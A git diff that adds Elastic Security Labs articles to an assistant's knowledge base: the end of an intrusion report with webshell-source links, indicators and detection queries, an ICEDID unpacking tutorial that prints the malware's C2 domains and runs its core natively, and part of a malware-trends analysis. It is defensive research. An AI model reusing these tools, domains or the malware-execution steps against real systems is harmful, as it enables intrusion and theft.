+* [https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md#abusing-ssrf-in-aws-ec2-environment](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md#abusing-ssrf-in-aws-ec2-environment)
+* [https://github.com/tutorial0/WebShell/blob/master/Aspx/ASPXspy.aspx](https://github.com/tutorial0/WebShell/blob/master/Aspx/ASPXspy.aspx)
+* [https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.ashx](https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.ashx)
+
+Furthermore, within these directories, we identified a few interesting binaries:
+
+**cloud_init**
+
+One of the files (`cloud_init`) is a Golang ELF binary packed with UPX. After inspection, it was determined that it was compiled from the [NPS repository](https://github.com/ehang-io/nps/tree/master), another intranet proxy server compatible with most common protocols. The threat actor altered the code to encrypt the strings during compilation. The decryption process uses separate byte arrays where the bytes of one array are combined with the bytes of the other array, employing operations such as addition, XOR, or subtraction for the decryption.
+
+![NPS string obfuscation example](/assets/images/unmasking-financial-services-intrusion-ref0657/image4.png "NPS string obfuscation example")
+
+
+**MSASN1.dll**
+
+After review, this DLL matched the same functionality/code as the previously discussed file (`msvcp140.dll`).
+
+### REF0657 through MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+#### Tactics
+
+Tactics represent the why of a technique or sub-technique. The adversary’s tactical goal is the reason for performing an action. The tactics observed in REF0657 were:
+
+* [Lateral Movement](https://attack.mitre.org/tactics/TA0008/)
+* [Persistence](https://attack.mitre.org/tactics/TA0003/)
+* [Execution](https://attack.mitre.org/tactics/TA0002/)
+* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+* [Discovery](https://attack.mitre.org/tactics/TA0007)
+* [Command and Control](https://attack.mitre.org/tactics/TA0011)
+* [Exfiltration](https://attack.mitre.org/tactics/TA0010/)
+
+#### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action. Elastic Security Labs observed the following techniques within REF0657:
+
+* [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)
+* [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)
+* [Masquerading](https://attack.mitre.org/techniques/T1036/)
+* [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/)
+* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)
+* [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)
+* [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/)
+
+## Summary
+
+In summary, this intrusion highlighted some new tooling while re-emphasizing that not all intrusions are dictated by novel malware and techniques. These types of threats demonstrate the real-world challenges most organizations are faced with daily.  
+
+The threat group moved very quickly in this environment, where within almost 24 hours, meaningful data to the attacker was extracted from the network. Sharing some of these details can help defenders plug possible holes or gaps in coverage from some of these techniques.
+
+### The Diamond Model
+
+Elastic Security Labs utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.
+
+![REF0657 - Diamond Model](/assets/images/unmasking-financial-services-intrusion-ref0657/image7.png "REF0657 - Diamond Model")
+
+
+## Detecting REF0657
+
+The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:
+
+### Detection
+
+* [Direct Outbound SMB Connection](https://www.elastic.co/guide/en/security/current/direct-outbound-smb-connection.html#direct-outbound-smb-connection)
+* [Execution via MSSQL xp_cmdshell Stored Procedure](https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp-cmdshell-stored-procedure.html)
+* [Execution via Renamed Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_execution_via_renamed_signed_binary_proxy.toml)
+* [Potential Remote Credential Access via Registry](https://www.elastic.co/guide/en/security/current/potential-remote-credential-access-via-registry.html)
+* [Process Execution from an Unusual Directory](https://www.elastic.co/guide/en/security/current/process-execution-from-an-unusual-directory.html)
+* [Suspicious CertUtil Commands](https://www.elastic.co/guide/en/security/current/suspicious-certutil-commands.html)
+* [WMI Incoming Lateral Movement](https://www.elastic.co/guide/en/security/current/wmi-incoming-lateral-movement.html)
+
+### Prevention
+
+* [Ingress Tool Transfer via INET Cache](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_ingress_tool_transfer_via_inet_cache.toml)
+* [Potential Masquerading as Windows Error Manager](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml)
+* [Potential Lateral Movement via SMBExec](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/lateral_movement_potential_lateral_movement_via_smbexec.toml)
+* [Suspicious Cmd Execution via WMI](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_cmd_execution_via_wmi.toml)
+* [RunDLL32 with Unusual Arguments](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_with_unusual_arguments.toml)
+* [Suspicious PowerShell Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_powershell_execution.toml)
+
+### Hunting queries in Elastic
+
+Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+#### ES|QL queries
+
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below ES|QL queries to hunt for similar behaviors:
+
+```
+FROM logs-*
+  WHERE process.parent.name == "sqlservr.exe" 
+  AND process.name == "cmd.exe" 
+  AND process.command_line 
+  RLIKE ".*certutil.*"
+```
+
+```
+FROM logs-*
+  WHERE process.name == "ms_edge.exe" 
+  AND process.code_signature.exists == false 
+  AND NOT process.executable 
+  RLIKE ".*Program Files.*"
+```
+
+#### YARA
+
+Elastic Security has created the following YARA rules to identify this activity:
+
+* [Windows.Trojan.CobaltStrike](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar)
+* [Windows.Hacktool.SleepObfLoader](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_SleepObfLoader.yar)
+* [Multi.Hacktool.Nps](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Nps.yar)
+* [Multi.Hacktool.Rakshasa](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Rakshasa.yar)
+* [Windows.Hacktool.Iox](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Iox.yar)
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref0657) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type        | Name        | Reference                                  |
+|------------------------------------------------------------------|-------------|-------------|--------------------------------------------|
+| 206.237.3[.]150                                                  | ipv4-addr   |             | File hosting infrastructure                |
+| 206.237.0[.]49                                                   | ipv4-addr   |             | File hosting and supershell infrastructure |
+| 104.21.54[.]126                                                  | ipv4-addr   |             | Cobalt Strike infrastructure               |
+| 149.104.23[.]176                                                 | ipv4-addr   |             |                                            |
+| msedge[.]one                                                     | domain-name |             | Cobalt Strike infrastructure               |
+| bc90ef8121d20af264cc15b38dd1c3a866bfe5a9eb66064feb2a00d860a0e716 | SHA-256     | mscoree.dll |                                            |
+| 84b3bc58ec04ab272544d31f5e573c0dd7812b56df4fa445194e7466f280e16d | SHA-256     | MSASN1.dll  |                                            |
+
+## About Elastic Security Labs
+
+Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.
+
+Follow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). 
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unpacking_icedid.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unpacking_icedid.md
new file mode 100644
index 0000000000000..908ac3237da5a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unpacking_icedid.md
@@ -0,0 +1,367 @@
+---
+title: "Unpacking ICEDID"
+slug: "unpacking-icedid"
+date: "2023-05-04"
+subtitle: "A comprehensive tutorial with Elastic Security Labs open source tools"
+description: "ICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. We are releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID."
+author:
+  - slug: cyril-francois
+image: "photo-edited-07@2x.jpg"
+category:
+  - slug: tools
+tags:
+  - icedid
+---
+
+## Preamble
+
+ICEDID is a malware family [discovered](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/)in 2017 by IBM X-force researchers and is associated with the theft of login credentials, banking information, and other personal information. ICEDID has always been a prevalent family but achieved even more growth since EMOTET’s temporary [disruption](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation) in early 2021. ICEDID has been linked to the distribution of several distinct malware families including [DarkVNC](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc) and [COBALT STRIKE](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot). Regular industry reporting, including research publications like this one, help mitigate this threat.
+
+ICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. Following our latest [ICEDID research](https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary) that covers the GZip variant execution chain.
+
+In this tutorial, we will introduce these tools by unpacking a recent ICEDID sample starting with downloading a copy of the fake GZip binary:
+
+**Analyzing malware can be dangerous to systems and should only be attempted by experienced professionals in a controlled environment, like an isolated virtual machine or analysis sandbox. Malware can be designed to evade detection and infect other systems, so it's important to take all necessary precautions and use specialized tools to protect yourself and your systems.**
+
+[**54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f**](https://bazaar.abuse.ch/sample/54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f/)
+
+## Environment setup
+
+For this tutorial, we’re using Windows 10 and Python 3.10.
+
+Elastic Security Labs is releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID.
+
+| Script                                    | Description                                                      | Compatibility                   |
+| ----------------------------------------- | ---------------------------------------------------------------- | ------------------------------- |
+| decrypt_file.py                           | Decrypt ICEDID encrypted file                                    | Windows and others (not tested) |
+| gzip_variant/extract_gzip.py              | Extract payloads from ICEDID fake GZip file                      | Windows and others (not tested) |
+| gzip_variant/extract_payload_from_core.py | Extract and decrypt payloads from the rebuilt ICEDID core binary | Windows and others (not tested) |
+| gzip_variant/load_core.py                 | Load and execute core custom PE binary                           | Windows only                    |
+| gzip_variant/read_configuration.py        | Read ICEDID configuration file contained in the fake GZip        | Windows and others (not tested) |
+| rebuild_pe.py                             | Rebuild a PE from ICEDID custom PE file                          | Windows and others (not tested) |
+
+In order to use the tools, clone the [Elastic Security Lab release repository](https://github.com/elastic/labs-releases) and install the nightMARE module.
+
+```
+git clone https://github.com/elastic/labs-releases
+cd labs-release
+pip install .\nightMARE\
+```
+
+> All tools in this tutorial use the **nightMARE** module, this library implements different algorithms we need for unpacking the various payloads embedded within ICEDID. We’re releasing nightMARE because it is required for this ICEDID analysis, but stay tuned - more to come as we continue to develop and mature this framework.
+
+## Unpacking the fake GZip
+
+The ICEDID fake GZip is a file that [masquerades](https://attack.mitre.org/techniques/T1036/008/) as a valid GZip file formatted by encapsulating the real data with a [GZip header and footer](https://docs.fileformat.com/compression/gz/).
+
+![GZip header and footer](/assets/images/unpacking-icedid/image20.jpg)
+
+GZip magic bytes appear in red.  
+The GZip header is rendered in green.  
+The dummy filename value is blue.
+
+After the GZip header is the true data structure, which we describe below.
+
+![FakeGzip data structure](/assets/images/unpacking-icedid/image19.jpg)
+
+We will use the **labs-releases\tools\icedid\gzip-variant\extract_gzip.py** script to unpack this fraudulent GZip.
+
+```
+usage: extract_gzip.py [--help] input output
+
+positional arguments:
+  input       Input file
+  output      Output directory
+
+options:
+  -h, --help  show this help message and exit
+```
+
+We'll use extract_gzip.py on the ICEDID sample linked above and store the contents into a folder we created called “ **extract** ” (you can use any existing output folder).
+
+```
+python extract_gzip.py 54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f extract
+
+============================================================
+Fake Gzip
+============================================================
+is_dll: True
+core: UponBetter/license.dat (354282 bytes)
+stage_2: lake_x32.tmp (292352 bytes)
+
+extract\configuration.bin
+extract\license.dat
+extract\lake_x32.tmp
+```
+
+This script returns three individual files consisting of:
+
+- The encrypted configuration file: **configuration.bin**
+- The encrypted core binary: **license.dat**
+- The persistence loader: **lake_x32.tmp**
+
+![Files extracted from the fake GZip](/assets/images/unpacking-icedid/image11.jpg)
+
+## Decrypting the core binary and configuration files
+
+The configuration and the core binary we extracted are encrypted using ICEDID’s custom encryption scheme. We can decrypt them with the **labs-releases\tools\icedid\decrypt_file.py** script.
+
+```
+usage: decompress_file.py [--help] input output
+
+positional arguments:
+  input       Input file
+  output      Output file
+
+options:
+  -h, --help  show this help message and exit
+```
+
+As depicted here (note that decrypted files can be written to any valid destination):
+
+```
+python .\decrypt_file.py .\extract\license.dat .\extract\license.dat.decrypted
+
+python .\decrypt_file.py .\extract\configuration.bin .\extract\configuration.bin.decrypted
+```
+
+The core binary and the configuration are now ready to be processed by additional tools. See the data from the decrypted configuration presented in the following screenshot:
+
+![Hex view of the decrypted configuration file](/assets/images/unpacking-icedid/image17.jpg)
+
+## Reading the configuration
+
+The configuration file format is presented below.
+
+![Configuration file](/assets/images/unpacking-icedid/image4.png)
+
+The configuration can be read using the **labs-releases\tools\icedid\gzip-variant\read_configuration.py** script.
+
+```
+usage: read_configuration.py [--help] input
+
+positional arguments:
+  input       Input file
+
+options:
+  -h, --help  show this help message and exit
+```
+
+We’ll use the **read_configuration.py** script to read the **configuration.bin.decrypted** file we collected in the previous step.
+
+```
+python .\gzip-variant\read_configuration.py .\extract\configuration.bin.decrypted
+
+============================================================
+Configuration
+============================================================
+botnet_id: 0x3B7D6BA4
+auth_var: 0x00000038
+uri: /news/
+domains:
+        alishaskainz.com
+        villageskaier.com
+```
+
+This configuration contains two C2 domains:
+
+- alishaskainz[.]com
+- villageskaier[.]com
+
+For this sample, the beaconing URI that ICEDID uses is “ **/news/** ”.
+
+## Rebuilding the core binary for static analysis
+
+ICEDID uses a custom PE format to obfuscate its payloads thus defeating static or dynamic analysis tools that expect to deal with a normal Windows executable. The custom PE file format is described below.
+
+![Custom PE file format](/assets/images/unpacking-icedid/image8.jpg)
+
+If we want to analyze the core binary, for example with [IDA Pro](https://hex-rays.com/IDA-pro/), we need to rebuild it into a valid PE. We use the **labs-releases\tools\icedid\rebuild_pe.py** script.
+
+```
+usage: rebuild_pe.py [--help] [-o OFFSET] input output
+
+positional arguments:
+  input                 Input file
+  output                Output reconstructed PE
+
+options:
+  -h, --help            show this help message and exit
+  -o OFFSET, --offset OFFSET
+                        Offset to real data, skip possible garbage
+```
+
+However, when attempting to use **rebuild_pe.py** on the decrypted core binary, **license.dat.decrypted** , we receive the following error message:
+
+```
+python .\rebuild_pe.py .\extract\license.dat.decrypted .\extract\core.bin
+Traceback (most recent call last):
+  File "rebuild_pe.py", line 32, in <module>
+    main()
+  File "rebuild_pe.py", line 28, in main
+    custom_pe.CustomPE(data).to_pe().write(args.output)
+  File "nightmare\malware\icedid\custom_pe.py", line 86, in __init__
+    raise RuntimeError("Failed to parse custom pe")
+RuntimeError: Failed to parse custom pe
+```
+
+The subtlety here is that the custom PE data doesn’t always start at the beginning of the file. In this case, for example, if we open the file in a hexadecimal editor like [HxD](https://mh-nexus.de/en/hxd/) we can observe a certain amount of garbage bytes before the actual data.
+
+![Prepended garbage bytes](/assets/images/unpacking-icedid/image14.jpg)
+
+We know from our research that the size of the garbage is **129** bytes.
+
+![Identifying garbage size](/assets/images/unpacking-icedid/image1.jpg)
+
+With that in mind, we can skip over the garbage bytes and rebuild the core binary using the **rebuild_pe.py** script using the **“-o 129”** parameter. This time we, fortunately, receive no error message. **core.bin** will be saved to the output directory, **extract** in our example.
+
+```
+python .\rebuild_pe.py .\extract\license.dat.decrypted .\extract\core.bin -o 129
+```
+
+The rebuilt PE object is **not** directly executable but you can statically analyze it using your disassembler of choice.
+
+![IDA view of core.bin](/assets/images/unpacking-icedid/image5.jpg)
+
+We assigned custom names to the rebuilt binary sections ( **.mare\{0,1,2,...\}** ).
+
+![Rebuilt binary section names](/assets/images/unpacking-icedid/image7.jpg)
+
+We want to credit and thank [Hasherezade’s work](https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp#L10) from which we took inspiration to build this tool.
+
+## Executing the core binary (Windows only)
+
+The core binary can’t be executed without a custom loader that understands ICEDID’s custom PE format as well as the entry point function prototype.
+
+From our research, we know that the entry point expects a structure we refer to as the context structure, which contains ICEDID core and persistence loader paths with its encrypted configuration. The context structure is described below.
+
+![Context structure](/assets/images/unpacking-icedid/image2.jpg)
+
+To natively execute the core binary we use the **labs-releases\tools\icedid\gzip-variant\load_core.py** script, but before using it we need to create the **context.json** file that’ll contain all the information needed by this script to build this structure.
+
+For this sample, we copy the information contained in the fake gzip and we use the path to the encrypted configuration file. We’ve included an example at **gzip_variant/context.json.example**.
+
+![Example configuration file](/assets/images/unpacking-icedid/image3.jpg)
+
+Please note that **“field_0”** and **“stage_2_export”** values have to be found while reversing the sample.
+
+![Populating values from previous research](/assets/images/unpacking-icedid/image16.jpg)
+
+Here we use values from our previous research as placeholders but we have no guarantee that the sample will work 100%. For example, in this sample, we don’t know if the **#1** ordinal export is the actual entry point of the persistence loader.
+
+We also reproduce the first stage behavior by creating the **UponBetter** directory and moving the **license.dat** file into it.
+
+![license.dat in the UponBetter directory](/assets/images/unpacking-icedid/image18.jpg)
+
+We execute the **labs-releases\tools\icedid\gzip_variant\load_core.py** script using the **decrypted core** binary: **license.dat.decrypted** , the **context.json** file.
+
+**WARNING: The binary is going to be loaded/executed natively by this script, Elastic Security Labs does not take responsibility for any damage to your system. Please execute only within a safe environment.**
+
+```
+usage: load_core.py [--help] [-o OFFSET] core_path ctx_path
+
+positional arguments:
+  core_path             Core custom PE
+  ctx_path              Path to json file defining core's context
+
+options:
+  -h, --help            show this help message and exit
+  -o OFFSET, --offset OFFSET
+                        Offset to real data, skip possible garbage
+```
+
+Because we have the same garbage bytes problem as stated in the previous section, we use the **“-o 129”** parameter to skip over the garbage bytes.
+
+```
+python .\gzip-variant\load_core.py .\extract\license.dat.decrypted .\gzip-variant\context.example.json -o 129
+
+============================================================
+Core Loader
+============================================================
+Base address: 0x180000000
+Entrypoint: 0x180001390
+
+Press a key to call entrypoint...
+```
+
+When launched, the script will wait for user input before calling the entry point. We can easily attach a debugger to the Python process and set a breakpoint on the ICEDID core entry point (in this example **0x180001390** ).
+
+![Breakpoint set on the ICEDID core entry point](/assets/images/unpacking-icedid/image13.jpg)
+
+Once the key is pressed, we reach the entry point.
+
+![ICEDID entry point](/assets/images/unpacking-icedid/image15.jpg)
+
+If we let the binary execute, we see ICEDID threads being created (indicated in the following screenshot).
+
+![ICEDID threads being created](/assets/images/unpacking-icedid/image6.jpg)
+
+## Unpacking and rebuilding payloads from the rebuilt core binary
+
+For extracting any of the payloads that are embedded inside the core binary, we will use the **labs-releases\tools\icedid\gzip-variant\extract_payloads_from_core.py** script
+
+```
+usage: extract_payloads_from_core.py [--help] input output
+
+positional arguments:
+  input       Input file
+  output      Output directory
+
+options:
+  -h, --help  show this help message and exit
+```
+
+We’ll use this script on the rebuilt core binary.
+
+```
+python .\gzip-variant\extract_payloads_from_core.py .\extract\core.bin core_extract
+
+core_extract\browser_hook_payload_0.cpe
+core_extract\browser_hook_payload_1.cpe
+```
+
+From here, we output two binaries corresponding to ICEDID’s payloads for web browser hooking capabilities, however, they are still in their custom PE format.
+
+![ICEDID payloads](/assets/images/unpacking-icedid/image10.jpg)
+
+Based on our research, we know that **browser_hook_payload_0.cpe** is the x64 version of the browser hook payload and **browser_hook_payload_1.cpe** is the x86 version.
+
+![Browser hook payload architectures](/assets/images/unpacking-icedid/image12.jpg)
+
+In order to rebuild them, we use the **rebuild_pe.py** script again, this time there are no garbage bytes to skip over.
+
+```
+python .\rebuild_pe.py .\core_extract\browser_hook_payload_0.cpe .\core_extract\browser_hook_payload_0.bin
+
+python .\rebuild_pe.py .\core_extract\browser_hook_payload_1.cpe .\core_extract\browser_hook_payload_1.bin
+```
+
+Now we have two PE binaries ( **browser_hook_payload_0.bin** and **browser_hook_payload_1.bin** ) we can further analyze.
+
+![Payloads for further analysis](/assets/images/unpacking-icedid/image9.jpg)
+
+Attentive readers may observe that we have skipped the **VNC server** unpacking from the core binary, a decision we made intentionally. We will release it along with other tools in upcoming research, so stay tuned!
+
+## Conclusion
+
+In this tutorial we covered ICEDID GZip variant unpacking, starting with the extraction of the fake GZip binary, followed by the reconstruction of the core binary and unpacking its payloads.
+
+ICEDID is constantly evolving, and we are going to continue to monitor major changes and update our tooling along with our research. Feel free to [open an issue](https://github.com/elastic/labs-releases/issues) or [send us a message](mailto:threat-notification@elastic.co) if something is broken or doesn’t work as expected.
+
+Elastic Security Labs is a team of dedicated researchers and security engineers focused on disrupting adversaries through the publication of detailed detection logic, protections, and applied threat research.
+
+Follow us on [@elasticseclabs](https://twitter.com/elasticseclabs)and visit our research portal for more resources and research.
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf](https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf)
+- [https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/)
+- [https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc)
+- [https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot)
+- [https://github.com/elastic/labs-releases](https://github.com/elastic/labs-releases)
+- [https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp](https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp)
+- [https://mh-nexus.de/en/hxd/](https://mh-nexus.de/en/hxd/)
+- [https://hex-rays.com/IDA-pro/](https://hex-rays.com/IDA-pro/)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unveiling_malware_behavior_trends.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unveiling_malware_behavior_trends.md
new file mode 100644
index 0000000000000..559c0d5a5e444
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unveiling_malware_behavior_trends.md
@@ -0,0 +1,157 @@
+---
+title: "Unveiling malware behavior trends"
+slug: "unveiling-malware-behavior-trends"
+date: "2024-03-20"
+subtitle: "Analyzing a Windows dataset of over 100,000 malicious files"
+description: "An analysis of a diverse dataset of Windows malware extracted from more than 100,000 samples revealing insights into the most prevalent tactics, techniques, and procedures."
+author:
+  - slug: samir-bousseaden
+image: "Security Labs Images 20.jpg"
+category:
+  - slug: security-research
+---
+
+## Preamble
+
+When prioritizing detection engineering efforts, it's essential to understand the most prevalent tactics, techniques, and procedures (TTPs) observed in the wild. This knowledge helps defenders make informed decisions about the most effective strategies to implement - especially where to focus engineering efforts and finite resources.
+
+To highlight these prevalent TTPs, we analyzed over [100,000 Windows malware samples](https://gist.github.com/Samirbous/eebeb8f776f7ab2d51cdd2ac05669dcf) extracted over several months from one of our dynamic malware analysis tools, [Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate). To generate this data and alerts, we leveraged Elastic Defend behavior (mapped to MITRE ATT&CK) and [memory threat detection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection) rules. It should be noted that this dataset is not exhaustive, it may not represent the entire spectrum of malware behavior, and specifically does not include long-term or interactive activity.
+
+Below an [ES|QL](https://www.elastic.co/blog/esql-elasticsearch-piped-query-language) query to summarize our dataset by file type:
+
+![Dataset by extension - 20 unique file types](/assets/images/unveiling-malware-behavior-trends/image12.png)
+
+
+## Tactics
+
+Beginning with tactics, we aggregated the alerts generated by this corpus of malware samples and organized them according to the counts of [```process.entity_id```](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) and alerts. As depicted in the image below, the most frequent tactics included defense evasion, privilege escalation, execution, and persistence. Certain tactics commonly linked with post-exploitation activities, such as lateral movement, provided an anticipated lower prevalence because these actions are commonly manually driven by the threat actor after the initial implant is established vs. being automated by the malware in our dataset.
+
+![Tactics by volume](/assets/images/unveiling-malware-behavior-trends/image9.png)
+
+
+In the following sections, we will delve into each tactic and the techniques and sub-techniques of each that exerted the most influence.
+
+### Defense Evasion
+
+Defense Evasion involves methods employed by adversaries to avoid detection by security teams or capabilities. The foremost tactic detected was defense evasion, triggering 189 distinct detection rules (nearly 40% of our current Windows rules). The primary techniques noted are associated with [code injection](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1055%22&type=code), [defense tampering](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Impair+Defenses%22&type=code), [masquerading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Masquerade+Task+or+Service%22&type=code), and [system binary proxy execution](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218%22&type=code).
+
+![Top observed defense evasion techniques](/assets/images/unveiling-malware-behavior-trends/image15.png)
+
+
+When we pivot by sub-techniques, it becomes evident that certain advanced techniques such as [DLL side-loading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22DLL+Side-Loading%22&type=code&p=1) and [Parent PID Spoofing](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20%22Parent%20PID%20Spoofing%22&type=code) have become increasingly popular, even among non-targeted malwares. Both are frequently linked with code injection and masquerading.
+
+Furthermore, system binary proxies [```Rundll32```](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.011%22&type=code) and [```Regsvr32```](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.010%22&type=code) remain highly abused, with a notable rise in the utilization of malicious [MSI installers](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.007%22&type=code) for malware delivery. The practice of [masquerading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Masquerade+Task+or+Service%22&type=code) as legitimate system binaries, whether through renaming or process hollowing, remains prevalent as well, serving as a means to evade user suspicion.
+
+![Top observed defense evasion sub-techniques](/assets/images/unveiling-malware-behavior-trends/image6.png)
+
+
+Tampering with Windows Defender stands out as the most frequently observed defense evasion tactic, emphasizing the importance for defenders to acknowledge that adversaries will attempt to obscure their activities. 
+
+Process Injection is prevalent across various malware families, whether they target legitimate system binaries remotely to blend in or employ self-injection (sometimes paired with DLL side-loading through a trusted binary). Furthermore, there is a noticeable uptick in the use of NTDLL unhooking to bypass security solutions reliant on user-mode APIs monitoring (Elastic Defend is not impacted).
+
+![The most effective endpoint behavior rules for defense evasion](/assets/images/unveiling-malware-behavior-trends/image16.png)
+
+
+From our shellcode alerts we can clearly see that self-injection is more prevalent than remote: 
+
+![Shellcode alerts volume by infection target type (local vs remote)](/assets/images/unveiling-malware-behavior-trends/image7.png)
+
+
+Almost 50 unique vendors’ binaries abused for DLL side-loading, of which Microsoft is the top choice: 
+
+![DLL side-load by host process code signature subject name](/assets/images/unveiling-malware-behavior-trends/image19.png)
+
+
+Defense evasion comprises various techniques and sub-techniques necessitating comprehensive coverage due to their frequent occurrence. For instance, apart from [memory threat protection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection), [half](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts++name+%3D+%22Defense+Evasion%22&type=code) of our rules are specifically tailored to address this tactic.
+
+### Privilege Escalation
+
+This tactic consists of techniques that adversaries use to gain greater permissions on a system or network. The most commonly used techniques relate to [access token manipulation](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1134%22&type=code), execution through privileged [system services](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1543.003%22&type=code), and bypassing [User Account Control](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1548.002%22&type=code).
+
+![Privilege escalation techniques observed in the dataset](/assets/images/unveiling-malware-behavior-trends/image10.png)
+
+
+The most frequently observed sub-technique involved impersonation as the Trusted Installer service, which aligns closely with defense evasion and often precedes attempts to manipulate system-protected resources. 
+
